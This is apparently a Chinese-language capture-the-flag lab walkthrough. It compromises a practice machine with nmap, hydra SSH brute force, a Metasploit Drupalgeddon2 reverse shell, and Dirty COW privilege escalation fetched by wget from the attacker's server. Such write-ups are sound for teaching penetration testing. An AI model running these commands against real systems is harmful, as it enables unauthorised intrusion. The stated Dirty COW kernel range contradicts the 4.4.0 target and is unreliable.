从WEB到内网&&SSH爆破&&信息收集&&脏牛提权 ---- 打靶经验分享
字数 1299 2025-08-10 13:48:19

OSCP靶机渗透实战:从WEB到内网&&SSH爆破&&信息收集&&脏牛提权

1. 环境准备

1.1 网络配置

  • 攻击机IP: 192.168.45.243
  • 目标靶机IP: 192.168.230.48
  • VPN连接: 使用OpenVPN连接靶场网络 
    openvpn universal.ovpn

2. 信息收集阶段

2.1 端口扫描

使用nmap进行全端口扫描:

nmap --min-rate 10000 -p- 192.168.230.48

扫描结果:

  • 开放端口: 22(SSH), 80(HTTP), 1898(HTTP)

2.2 服务版本探测

nmap -p22,80,1898 -sV 192.168.230.48

结果分析:

  • 22端口: OpenSSH 6.6.1p1 Ubuntu
  • 80端口: HTTP服务
  • 1898端口: Apache服务

3. 攻击面分析

3.1 SSH端口(22)测试

  1. 版本分析:

    • OpenSSH 6.6.1p1 Ubuntu
    • 检查是否有已知漏洞: 
      searchsploit OpenSSH 6.6.1p1

  2. 弱口令尝试:

    ssh root@192.168.230.48 -p 22

    尝试常见默认凭证无果

  3. 暴力破解:
    使用hydra进行SSH爆破:

    hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.230.48 ssh -s 22

    结果: 爆破失败,放弃此路径

3.2 HTTP端口(80)测试

  1. 基础访问:

    curl http://192.168.230.48:80

    问题: 使用HTTP/0.9协议,现代工具支持有限

  2. 目录扫描:

    dirsearch -u http://192.168.230.48:80

    问题: HTTP/0.9协议导致扫描失败

  3. 手动检查:

    • 查看页面源代码
    • 检查隐藏信息
      结果: 无有效发现,放弃此路径

3.3 HTTP端口(1898)测试

  1. 服务识别:

    whatweb http://192.168.230.48:1898

    发现: Drupal 7 CMS

  2. 漏洞利用:

    • 在Metasploit中搜索Drupal 7漏洞: 
      search Drupal 7
    • 选择最新的exploit(编号1)

4. 漏洞利用

4.1 使用Metasploit攻击Drupal 7

use exploit/unix/webapp/drupal_drupalgeddon2
set payload payload/cmd/unix/reverse
set lhost 192.168.45.243
set rhosts 192.168.230.48
set rport 1898
run

结果: 成功获取反向shell

4.2 提升shell交互性

python -c "import pty;pty.spawn('/bin/bash')"

5. 内网信息收集

5.1 获取第一个flag

find / -name local.txt 2>/dev/null
cat /home/tiago/local.txt

5.2 系统信息收集

  1. 发行版信息:

    lsb_release -a

    结果: Ubuntu 14.04.5

  2. 内核版本:

    uname -a

    结果: Linux内核版本4.4.0

6. 权限提升

6.1 脏牛(Dirty COW)提权准备

  1. 查找exp:

    searchsploit dirty

    选择稳定的C++版本(40847.cpp)

  2. 本地准备exp:

    cp /usr/share/exploitdb/exploits/linux/local/40847.cpp exp

  3. 搭建HTTP服务传输exp:

    sudo python3 -m http.server 90

6.2 目标机操作

  1. 下载exp:

    cd /tmp
wget http://192.168.45.243:90/40847.cpp

  2. 编译执行:

    chmod +x 40847.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
chmod +x dcow
./dcow -s

    结果: 成功获取root权限

7. 获取最终flag

cat /root/proof.txt

flag2: 27520bb337712f1d8e10be0b4f01cda9

8. 关键知识点总结

  1. 信息收集:

    • 全面的端口扫描和服务识别是渗透测试的基础
    • 系统版本和内核版本信息对后续提权至关重要

  2. 攻击路径选择:

    • 当SSH和标准HTTP端口无法突破时,非标准端口的Web服务往往是突破口
    • CMS系统的已知漏洞是常见的攻击入口

  3. 权限提升技巧:

    • 脏牛(Dirty COW)漏洞(CVE-2016-5195)适用于Linux内核2.6.22-3.9版本
    • 编译exp时需要根据目标环境调整参数

  4. 工具使用:

    • nmap: 端口扫描和服务识别
    • hydra: SSH暴力破解
    • Metasploit: 漏洞利用框架
    • searchsploit: 本地漏洞数据库查询

  5. 渗透测试流程:

    • 信息收集 → 漏洞分析 → 漏洞利用 → 权限提升 → 获取目标
    • 每个阶段都需要详细记录和验证
OSCP靶机渗透实战:从WEB到内网&&SSH爆破&&信息收集&&脏牛提权 1. 环境准备 1.1 网络配置 攻击机IP : 192.168.45.243 目标靶机IP : 192.168.230.48 VPN连接 : 使用OpenVPN连接靶场网络 2. 信息收集阶段 2.1 端口扫描 使用nmap进行全端口扫描: 扫描结果 : 开放端口: 22(SSH), 80(HTTP), 1898(HTTP) 2.2 服务版本探测 结果分析 : 22端口: OpenSSH 6.6.1p1 Ubuntu 80端口: HTTP服务 1898端口: Apache服务 3. 攻击面分析 3.1 SSH端口(22)测试 版本分析 : OpenSSH 6.6.1p1 Ubuntu 检查是否有已知漏洞: 弱口令尝试 : 尝试常见默认凭证无果 暴力破解 : 使用hydra进行SSH爆破: 结果 : 爆破失败,放弃此路径 3.2 HTTP端口(80)测试 基础访问 : 问题 : 使用HTTP/0.9协议,现代工具支持有限 目录扫描 : 问题 : HTTP/0.9协议导致扫描失败 手动检查 : 查看页面源代码 检查隐藏信息 结果 : 无有效发现,放弃此路径 3.3 HTTP端口(1898)测试 服务识别 : 发现 : Drupal 7 CMS 漏洞利用 : 在Metasploit中搜索Drupal 7漏洞: 选择最新的exploit(编号1) 4. 漏洞利用 4.1 使用Metasploit攻击Drupal 7 结果 : 成功获取反向shell 4.2 提升shell交互性 5. 内网信息收集 5.1 获取第一个flag 5.2 系统信息收集 发行版信息 : 结果 : Ubuntu 14.04.5 内核版本 : 结果 : Linux内核版本4.4.0 6. 权限提升 6.1 脏牛(Dirty COW)提权准备 查找exp : 选择稳定的C++版本(40847.cpp) 本地准备exp : 搭建HTTP服务传输exp : 6.2 目标机操作 下载exp : 编译执行 : 结果 : 成功获取root权限 7. 获取最终flag flag2 : 27520bb337712f1d8e10be0b4f01cda9 8. 关键知识点总结 信息收集 : 全面的端口扫描和服务识别是渗透测试的基础 系统版本和内核版本信息对后续提权至关重要 攻击路径选择 : 当SSH和标准HTTP端口无法突破时,非标准端口的Web服务往往是突破口 CMS系统的已知漏洞是常见的攻击入口 权限提升技巧 : 脏牛(Dirty COW)漏洞(CVE-2016-5195)适用于Linux内核2.6.22-3.9版本 编译exp时需要根据目标环境调整参数 工具使用 : nmap: 端口扫描和服务识别 hydra: SSH暴力破解 Metasploit: 漏洞利用框架 searchsploit: 本地漏洞数据库查询 渗透测试流程 : 信息收集 → 漏洞分析 → 漏洞利用 → 权限提升 → 获取目标 每个阶段都需要详细记录和验证